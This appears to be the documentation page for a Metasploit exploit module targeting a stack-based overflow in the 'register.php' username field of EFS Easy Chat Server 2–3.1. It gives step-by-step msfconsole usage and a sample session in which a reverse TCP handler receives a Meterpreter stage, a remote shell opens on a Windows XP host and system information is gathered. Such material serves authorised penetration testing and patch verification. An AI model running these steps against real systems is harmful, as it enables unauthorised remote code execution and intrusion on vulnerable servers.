1.7 KiB
1.7 KiB
Description
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
Vulnerable Application
Easy Chat Server Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
This module has been tested successfully on
- Easy Chat Server 3.1 on Windows XP En SP3
Installers:
EFS Easy Chat Server Installers
Verification Steps
- Start
msfconsole - Do:
use exploits/windows/http/easychatserver_seh - Do:
set rhosts [IP] - Do:
exploit - You should get your payload executed
Scenarios
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
meterpreter > sysinfo
Computer : MM-8B040C5B05D9
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easychatserver_seh) >